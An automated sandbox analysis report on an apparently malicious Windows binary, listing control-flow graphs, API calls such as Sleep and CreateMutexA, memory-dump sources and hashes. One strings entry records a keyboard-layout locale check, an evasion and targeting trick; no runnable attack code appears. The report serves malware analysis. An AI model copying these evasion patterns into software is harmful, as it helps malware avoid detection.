13290 53616 13289->13290 13291 52ce0 5 API calls 13290->13291 13294 5364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 13290->13294 13292 5369e 13291->13292 13293 52c00 3 API calls 13292->13293 13292->13294 13293->13294 13294->13288 12851 5a9f4 12862 59230 12851->12862 12853 5aa03 shared_ptr 12854 55c10 6 API calls 12853->12854 12861 5aab3 shared_ptr 12853->12861 12855 5aa65 12854->12855 12856 55c10 6 API calls 12855->12856 12857 5aa8d 12856->12857 12858 55c10 6 API calls 12857->12858 12858->12861 12859 5ad3c shared_ptr __floor_pentium4 12861->12859 12872 88ab6 12861->12872 12865 59284 shared_ptr 12862->12865 12863 55c10 6 API calls 12863->12865 12864 59543 shared_ptr __floor_pentium4 12864->12853 12865->12863 12870 5944f shared_ptr 12865->12870 12866 55c10 6 API calls 12866->12870 12867 598b5 shared_ptr __floor_pentium4 12867->12853 12868 5979f shared_ptr 12868->12867 12869 55c10 6 API calls 12868->12869 12871 59927 shared_ptr __floor_pentium4 12869->12871 12870->12864 12870->12866 12870->12868 12871->12853 12873 88ad1 12872->12873 12874 88868 4 API calls 12873->12874 12875 88adb 12874->12875 12875->12861 12888 54276 12889 52410 5 API calls 12888->12889 12890 5427f 12889->12890 12820 58d30 12821 58d7f 12820->12821 12822 55c10 6 API calls 12821->12822 12823 58d9a shared_ptr __floor_pentium4 12822->12823 12839 52170 12840 6c6fc InitializeCriticalSectionEx 12839->12840 12841 5217a 12840->12841 12896 542b0 12899 53ac0 12896->12899 12898 542bb shared_ptr 12900 53af9 12899->12900 12901 532d0 6 API calls 12900->12901 12903 53c38 12900->12903 12904 53b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12900->12904 12901->12903 12902 532d0 6 API calls 12906 53c5f 12902->12906 12903->12902 12903->12906 12904->12898 12905 53c68 12905->12898 12906->12905 12907 53810 4 API calls 12906->12907 12908 53cdb 12907->12908 13103 577b0 13104 577f1 shared_ptr 13103->13104 13105 55c10 6 API calls 13104->13105 13107 57883 shared_ptr 13104->13107 13105->13107 13106 55c10 6 API calls 13109 579e3 13106->13109 13107->13106 13108 57953 shared_ptr __floor_pentium4 13107->13108 13110 55c10 6 API calls 13109->13110 13111 57a15 shared_ptr 13110->13111 13112 57aa5 shared_ptr __floor_pentium4 13111->13112 13113 55c10 6 API calls 13111->13113 13114 57b7d 13113->13114 13115 55c10 6 API calls 13114->13115 13116 57ba0 13115->13116 13117 55c10 6 API calls 13116->13117 13117->13112 13118 587b0 13119 587b6 13118->13119 13120 587b8 GetFileAttributesA 13118->13120 13119->13120 13121 587c4 13120->13121 13122 647b0 13124 64eed 13122->13124 13123 64f59 shared_ptr __floor_pentium4 13124->13123 13125 57d30 7 API calls 13124->13125 13126 650ed 13125->13126 13161 58380 13126->13161 13128 65106 13129 55c10 6 API calls 13128->13129 13130 65155 13129->13130 13131 55c10 6 API calls 13130->13131 13132 65171 13131->13132 13167 59a00 13132->13167 13162 583e5 __cftof 13161->13162 13163 58403 shared_ptr __floor_pentium4 13162->13163 13164 55c10 6 API calls 13162->13164 13163->13128 13165 58427 13164->13165 13166 55c10 6 API calls 13165->13166 13166->13163 13168 59a3f 13167->13168 13169 55c10 6 API calls 13168->13169 13170 59a47 13169->13170 13171 58b30 6 API calls 13170->13171 13172 59a58 13171->13172 12571 587b2 12572 587b6 12571->12572 12573 587b8 GetFileAttributesA 12571->12573 12572->12573 12574 587c4 12573->12574 12913 59ab8 12915 59acc 12913->12915 12916 59b08 12915->12916 12917 55c10 6 API calls 12916->12917 12918 59b7c 12917->12918 12925 58b30 12918->12925 12920 59b8d 12921 55c10 6 API calls 12920->12921 12922 59cb1 12921->12922 12923 58b30 6 API calls 12922->12923 12924 59cc2 12923->12924 12926 58b7c 12925->12926 12927 55c10 6 API calls 12926->12927 12928 58b97 shared_ptr __floor_pentium4 12927->12928 12928->12920
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,0008652A,?,?,?,?,?,00087661), ref: 00086567
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                • Opcode ID: ec1b298f6ec9607fdbc4e269192f8e02c5accad0a20e85d1c9fd6c63da4cf232
                                                                                                                                                                                                                                • Instruction ID: edeeef6e4d2235633c462bb3d71f0a706978009bdcdcbf0edf3ab40705a658e1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec1b298f6ec9607fdbc4e269192f8e02c5accad0a20e85d1c9fd6c63da4cf232
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45E08C30051908AFDF65BB1CC90DD897BA9FB52B56F010C00F85A86226CB26EE81C781
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d441e979657372bedab641fbd16624962268626e1c06e9af2029fbbef54c65a4
                                                                                                                                                                                                                                • Instruction ID: 7ace12394a63d42e578a2845952a5e5baa8a4d447d1b1ceb41492047828356e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d441e979657372bedab641fbd16624962268626e1c06e9af2029fbbef54c65a4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 310192E7748118BE71438D9527546BA6A6EF6DB3383308F26B407D5A42F6C83A787131

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                • API String ID: 0-3963862150
                                                                                                                                                                                                                                • Opcode ID: f5adca7cf27daac9b2e004b0055367c6425f02a40210b21dcfe5903ed924c601
                                                                                                                                                                                                                                • Instruction ID: dfce6da7762b4b262ea70637fb101b8444fbcbaf002bf5bcbeb9a9130b689522
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5adca7cf27daac9b2e004b0055367c6425f02a40210b21dcfe5903ed924c601
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F1D3709002489FEB24DF54CC85BDEBBB9EF45304F5046A9F908A7282DB759A88CF95

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 219 59ba5-59d91 call 67a00 call 55c10 call 58b30 call 68220
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: c9cb37624e1c0f1a792ec28daa8a661c02eb3b2e4e918085bbf87e4bcb39b8e6
                                                                                                                                                                                                                                • Instruction ID: 07a30bda0a5cb12b23f0191422e37494006a567d5ca000c52019ee9847d9240e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9cb37624e1c0f1a792ec28daa8a661c02eb3b2e4e918085bbf87e4bcb39b8e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54312A31704244CBFB089B6CDD897AFBBA2EB82312F248718E414DB3D6C77599848752

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 241 59f44-59f64 245 59f66-59f72 241->245 246 59f92-59fae 241->246 247 59f74-59f82 245->247 248 59f88-59f8f call 6d663 245->248 249 59fb0-59fbc 246->249 250 59fdc-59ffb 246->250 247->248 251 5a92b 247->251 248->246 253 59fd2-59fd9 call 6d663 249->253 254 59fbe-59fcc 249->254 255 59ffd-5a009 250->255 256 5a029-5a916 call 680c0 250->256 258 5a953-5a994 Sleep CreateMutexA 251->258 259 5a92b call 86c6a 251->259 253->250 254->251 254->253 262 5a01f-5a026 call 6d663 255->262 263 5a00b-5a019 255->263 271 5a9a7-5a9a8 258->271 272 5a996-5a998 258->272 259->258 262->256 263->251 263->262 272->271 273 5a99a-5a9a5 272->273 273->271
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
